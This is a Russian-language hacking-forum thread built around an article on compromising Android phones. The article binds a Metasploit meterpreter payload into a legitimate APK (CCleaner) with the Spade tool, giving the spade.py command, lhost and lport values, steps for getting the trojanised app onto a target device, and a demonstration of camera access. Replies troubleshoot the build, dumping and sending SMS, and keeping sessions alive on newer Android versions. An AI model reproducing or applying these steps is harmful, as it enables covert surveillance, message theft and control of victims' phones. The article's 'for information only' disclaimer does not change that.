• Профессиональным авторам. Срочный заказ!

    Необходимо сделать развернутое описание каждой из наших услуг. Ограничений на объем текста нет. ЦА - руководство компаний (сухой технический текст). При отсутствии исполнителей среди участников форума, работа будет передана фрилансерам 10 февраля.

    Подробнее о заказе ...

Статья Взлом Android-устройства

D

dimm666

А в payload.java указан ip адрес VPN ? И VPN имеет ли доступ к своему айпи из вне?
Доступ есть, но я, наверное, не учёл, что нужно указать открытый порт. Спасибо за пинок в нужном направлении.
P.S. возможно, глупый вопрос, но всё же - а можно ли указывать IP v6 ?
 
<~DarkNode~>

<~DarkNode~>

~^M1st3r_Bert0ni^~
Red Team
19.10.2016
723
3 009
Доступ есть, но я, наверное, не учёл, что нужно указать открытый порт. Спасибо за пинок в нужном направлении.
P.S. возможно, глупый вопрос, но всё же - а можно ли указывать IP v6 ?
Пока не готов ответить,как то мало практики с работой по IPv6 (
 
H

hanoi

Проблему решил ту, возникла следующая - не создается файл -final, то есть в консоли пишется, мол создан ....-final.apk
но в папке спейда пусто
Привет! решили проблему с ....-final.apk? у меня такая же проблемаo_O
 
H

hanoi

Снимок экрана от 2016-12-17 18-14-08.png
вот такая проблемка,не создаётся ....-final.apk Люди добрые помогите:)
 

Вложения

E

Epanalit

Подскажите как открыть backdoor на андроид если есть сессия meterpreter
 
ghostphisher

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 531
3 367
Загрузить и активировать за ранее созданный файл с полезной нагрузкой. Можно использовать различные фреймворки для создания. Команды можно посмотреть набрав help - там увидите.
 
  • Нравится
Реакции: Vander
slepoihudoznik

slepoihudoznik

New member
18.02.2017
3
0
Все получилось , дамп sms получить удалось лишь при создании 3 ей сессии , отправить смог лишь одну смс потом ошибку выдавало ... у кого проблемы с финалом апк ... файл например opera.apk кидаете в папку спаде , далее cd /root/spade/ , потом уже ./spade.py opera.apk через vpn и прочей .. сначало с андройда раздайте wifi в режиме модема и потренеруйтесь
 
M

Masua42RU

Все получилось , дамп sms получить удалось лишь при создании 3 ей сессии , отправить смог лишь одну смс потом ошибку выдавало ... у кого проблемы с финалом апк ... файл например opera.apk кидаете в папку спаде , далее cd /root/spade/ , потом уже ./spade.py opera.apk через vpn и прочей .. сначало с андройда раздайте wifi в режиме модема и потренеруйтесь
Спасибо! Помог, а то Я чего то затупил.
 
S

seregokross3

Открываю на мобиле приложение, оно вылетает, сессия не открывается....
В чем может быть проблема?
 
Ю

ЮляСаша

Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.

Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта , попробуем, для начала, на ней.

Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
***Скрытый текст***
Посмотреть вложение 7174

После успешного выполнения команды, вводим следующее:

> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)

После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.

> lhost > 192.168.0.103

> lport > 4444

Посмотреть вложение 7175

Посмотреть вложение 7176

Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.

Посмотреть вложение 7177

Видим привилегии, которые нам доступны:

Посмотреть вложение 7178

Готовый файл сохраняется в директории /root/spade

Посмотреть вложение 7179

На запрос этой настройки отвечаем утвердительно:

Посмотреть вложение 7180

Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:

Посмотреть вложение 7181

Попробуем осмотреться в системе:

Посмотреть вложение 7182

Все работает, теперь можно испытать работу, к примеру, камеры:
***Скрытый текст***
Посмотреть вложение 7183

И эта команда срабатывает успешно:

Посмотреть вложение 7184

На этом все, спасибо за внимание.

Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
Ссылка на оригинал -
Хорошая тема
[doublepost=1488732598,1488732405][/doublepost]Какое решение этой проблемы?
 
slepoihudoznik

slepoihudoznik

New member
18.02.2017
3
0
Попробуй перед тем как совать apk файл укоротить его имя до opera.apk например , с длинными именами апк у меня тоже глюки такого рода были .
[doublepost=1489571460,1489571365][/doublepost]С
Попробуй перед тем как совать apk файл укоротить его имя до opera.apk например , с длинными именами апк у меня тоже глюки такого рода были .
Совать скрипту ...
 
aveseth

aveseth

Member
04.12.2016
22
1
На 7-ом ведроиде эксплоит не срабатывает,сессия появляется,но через 4-5 секунд закрывается)
 
ghostphisher

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 531
3 367
На 7-ом ведроиде эксплоит не срабатывает,сессия появляется,но через 4-5 секунд закрывается)
Проблема может быть в приложение, в которое нагрузку вшили. Стоит потратить время на подбор рабочего случая.
 
F

freruneer

Оно не всегда работает , не на всех андроидах устанавливается .. и на некоторых когда делаешь запрос какой то то на телефоне выскакивает подтверждения этого действия
 
Мы в соцсетях: